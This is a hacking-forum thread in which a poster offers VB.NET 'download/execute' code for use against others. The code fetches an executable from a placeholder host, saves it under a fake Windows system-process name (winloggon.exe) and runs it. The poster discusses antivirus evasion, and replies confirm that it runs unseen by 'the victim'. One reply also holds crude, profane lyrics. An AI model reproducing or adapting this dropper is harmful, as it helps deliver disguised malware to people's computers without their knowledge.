![]() | ||||
![]() |
|
#1
| |||
| |||
| This is a simple VB.net Download/Execute code. Imports -- Put this way at the top(For noobs) Code: Imports System.IO Code: Private Function IsConnectionAvailable() As Boolean
Dim url As New System.Uri("http://www.google.com/")
Dim req As System.Net.WebRequest
req = System.Net.WebRequest.Create(url)
Dim resp As System.Net.WebResponse
Try
resp = req.GetResponse()
resp.Close()
req = Nothing
Return True
Catch ex As Exception
req = Nothing
Return False
End Try
End Function
Code: If IsConnectionAvailable() = True Then
Dim furl As String
Dim fpath As String
furl = "http://example.com/server.exe"
fpath = "c:\windows\winloggon.exe"
If File.Exists(fpath) Then
Try
File.Delete(fpath)
My.Computer.Network.DownloadFile(furl, fpath)
System.Threading.Thread.Sleep(100)
Process.Start(fpath)
Catch ex As Exception
System.Threading.Thread.Sleep(1)
End Try
Else
My.Computer.Network.DownloadFile(furl, fpath)
System.Threading.Thread.Sleep(100)
Process.Start(fpath)
End If
Else
Application.Exit()
End If
Your program will be scanned as undetected but when they download the file if it is not scantime/runtime FUD it may get detected by there Anti-Virus. |
| The Following User Says Thank You to Sasuke For This Useful Post: | ||
soap (02-20-2010) | ||
|
#2
| ||||
| ||||
| Very nice, can be improved a lot though |
|
#3
| ||||
| ||||
| Good Job! I am gonna try this sometime.. |
|
#4
| ||||
| ||||
| So does this do this in the bg so the victim doesnt relize it? |
|
#5
| ||||
| ||||
| Could be improved a lot, kind of old to be honest.
__________________ ![]() slip my ho a fourty four n' she crept in it back do' bitches lookin' at me strange but you know i don't care step up in this mothafucker just to swingin' my hair Bitch quit talkin' Crip walk If you down with the set Take a Bullet with some dick take this dope from this jet |
|
#6
| |||
| |||
| Yes. 10char |
|
#7
| ||||
| ||||
| ok cool...... |
![]() |
| Thread Tools | Search this Thread |
| Display Modes | |
| |